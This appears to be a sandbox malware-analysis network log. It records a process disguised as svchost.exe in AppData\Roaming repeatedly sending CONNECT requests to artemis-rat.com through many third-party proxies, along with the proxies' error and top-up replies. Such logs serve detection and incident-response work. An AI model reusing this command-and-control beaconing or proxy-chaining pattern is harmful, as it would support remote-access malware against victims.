                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:34.050287008 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3135192.168.2.56002723.137.248.1978043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:34.124748945 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3136192.168.2.56007494.131.59.2415837843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:34.131006002 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:34.351804018 CET1260INHTTP/1.1 403 Forbidden
                                                                                    Server: squid/6.0.0-20220501-re899e0c27
                                                                                    Mime-Version: 1.0
                                                                                    Date: Sat, 09 Mar 2024 12:14:34 GMT
                                                                                    Content-Type: text/html;charset=utf-8
                                                                                    Content-Length: 3670
                                                                                    X-Squid-Error: ERR_ACCESS_DENIED 0
                                                                                    Vary: Accept-Language
                                                                                    Content-Language: en
                                                                                    Cache-Status: ezproxies.com
                                                                                    Via: 1.1 ezproxies.com (squid/6.0.0-20220501-re899e0c27)
                                                                                    Connection: keep-alive
                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69
                                                                                    Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta type="copyright" content="Copyright (C) 1996-2022 The Squid Software Foundation and contributors"><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>ERROR: The requested URL could not be retrieved</title><style type="text/css">... /* * Copyright (C) 1996-2022 The Squid Software Foundation and contributors * * Squid software is distributed under GPLv2+ license and includes * contributions from numerous individuals and organizations. * Please see the COPYING and CONTRIBUTORS files for details. *//* Stylesheet for Squid Error pages Adapted from design by Free CSS Templates http://www.freecsstemplates.org Released for free under a Creative Commons Attribution 2.5 License*//* Page basics */* {font-family: verdana, sans-seri


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3137192.168.2.560010195.87.217.75338943312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:34.131100893 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3138192.168.2.560030161.35.83.251312843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:34.131156921 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:34.833652020 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:35.833662033 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:37.646342993 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3139192.168.2.560042185.100.233.1014113843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:34.131999016 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:34.424859047 CET226INHTTP/1.1 403 Forbidden
                                                                                    Date: Sat, 09 Mar 2024 12:14:34 GMT
                                                                                    Content-Length: 101
                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                    Data Raw: 48 54 54 50 2f 31 2e 31 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 0d 0a 50 6c 65 61 73 65 20 74 6f 70 75 70 3a 20 68 74 74 70 73 3a 2f 2f 61 73 6f 63 6b 73 2e 63 6f 6d 2f 61 64 64 2d 6d 6f 6e 65 79 2f 64 65 64 34 66 62 38 66 33 33 38 39 66 63 39 61 34 34 63 39 37 37 39 63 64 33 30 39 36 33 62 37 0d 0a
                                                                                    Data Ascii: HTTP/1.1 403 ForbiddenPlease topup: https://asocks.com/add-money/ded4fb8f3389fc9a44c9779cd30963b7


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3140192.168.2.56002594.30.152.1728043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:34.132242918 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:34.468419075 CET310INHTTP/1.1 400 Bad Request
                                                                                    Server: nginx
                                                                                    Date: Sat, 09 Mar 2024 12:14:33 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Content-Length: 150
                                                                                    Connection: close
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3141192.168.2.560011149.28.141.1806520143312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:34.132258892 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3142192.168.2.560035218.252.244.1268043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:34.132801056 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3143192.168.2.5600398.210.80.1911567343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:34.150515079 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3144192.168.2.560008167.86.69.1424536443312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:34.150645971 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:34.942667961 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3145192.168.2.560036216.9.224.1138043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:34.156029940 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3146192.168.2.560133172.67.181.1268043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:34.156075001 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:34.310561895 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:34 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3147192.168.2.559800125.227.225.157338943312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:34.156092882 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3148192.168.2.560033217.23.11.1943270843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:34.172244072 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:34.470671892 CET226INHTTP/1.1 403 Forbidden
                                                                                    Date: Sat, 09 Mar 2024 12:14:34 GMT
                                                                                    Content-Length: 101
                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                    Data Raw: 48 54 54 50 2f 31 2e 31 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 0d 0a 50 6c 65 61 73 65 20 74 6f 70 75 70 3a 20 68 74 74 70 73 3a 2f 2f 61 73 6f 63 6b 73 2e 63 6f 6d 2f 61 64 64 2d 6d 6f 6e 65 79 2f 64 65 64 34 66 62 38 66 33 33 38 39 66 63 39 61 34 34 63 39 37 37 39 63 64 33 30 39 36 33 62 37 0d 0a
                                                                                    Data Ascii: HTTP/1.1 403 ForbiddenPlease topup: https://asocks.com/add-money/ded4fb8f3389fc9a44c9779cd30963b7
                                                                                    Mar 9, 2024 13:14:35.307164907 CET226INHTTP/1.1 403 Forbidden
                                                                                    Date: Sat, 09 Mar 2024 12:14:34 GMT
                                                                                    Content-Length: 101
                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                    Data Raw: 48 54 54 50 2f 31 2e 31 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 0d 0a 50 6c 65 61 73 65 20 74 6f 70 75 70 3a 20 68 74 74 70 73 3a 2f 2f 61 73 6f 63 6b 73 2e 63 6f 6d 2f 61 64 64 2d 6d 6f 6e 65 79 2f 64 65 64 34 66 62 38 66 33 33 38 39 66 63 39 61 34 34 63 39 37 37 39 63 64 33 30 39 36 33 62 37 0d 0a
                                                                                    Data Ascii: HTTP/1.1 403 ForbiddenPlease topup: https://asocks.com/add-money/ded4fb8f3389fc9a44c9779cd30963b7


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3149192.168.2.56004947.100.207.117808043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:34.175606966 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:34.510691881 CET767INHTTP/1.1 403 Forbidden
                                                                                    Server: Beaver
                                                                                    Cache-Control: no-cache
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 635
                                                                                    Connection: close
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a
                                                                                    Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3150192.168.2.560060176.119.25.13312843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:34.180917025 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:34.942497969 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:35.942951918 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3151192.168.2.560057103.166.141.742007443312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:34.186043024 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3152192.168.2.5600728.211.4.2158043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:34.194382906 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:34.880242109 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3153192.168.2.55869451.79.87.1443046443312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:34.194752932 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:34.645592928 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:35.146222115 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:35.942857027 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:37.442869902 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:38.850475073 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
